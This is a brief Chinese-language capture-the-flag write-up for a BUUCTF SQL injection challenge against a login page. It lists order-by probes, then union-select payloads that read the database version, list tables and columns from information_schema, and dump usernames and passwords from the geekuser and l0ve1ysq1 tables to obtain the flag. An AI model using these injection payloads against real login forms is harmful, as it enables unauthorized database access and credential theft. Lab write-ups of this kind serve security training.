1.题:
2.题样:
3.万能用户或者万能密码,也可以bp:
提交试试,不对。看题目是简单的SQL注入。
4.http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username=1%27order%20by%2010%23%23&password=1
http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username=1%27order%20by%205%23%23&password=1
http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username=1%27order%20by%203%23%23&password=1
http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username=1%27order%20by%204%23%23&password=1
测试出字段为3.
可用字段,2,3:
查询数据库,版本等:
union select 1,database(),version()%23&password=1
数据库为geek。
爆表:
username=1’union select 1,group_concat(table_name),version() from information_schema.tables where table_schema=database()%23&password=1
首先geekuser表,爆字段:
username=1’union select 1,group_concat(column_name),version() from information_schema.columns where table_name=‘geekuser’%23&password=1
查询内容:
username=1’union select 1,group_concat(username),password from ‘geekuser’%23&password=1
username=1’union select 1,group_concat(id),password from geekuser%23&password=1
提交的password,不对。看看另外一张表l0ve1ysq1:
username=1’union select 1,group_concat(column_name),version() from information_schema.columns where table_name=‘l0ve1ysq1’%23&password=1
username=1’union select 1,group_concat(username),password from l0ve1ysq1%23&password=1
username=1’union select 1,username,group_concat(password) from l0ve1ysq1 where username=‘flag’%23&password=1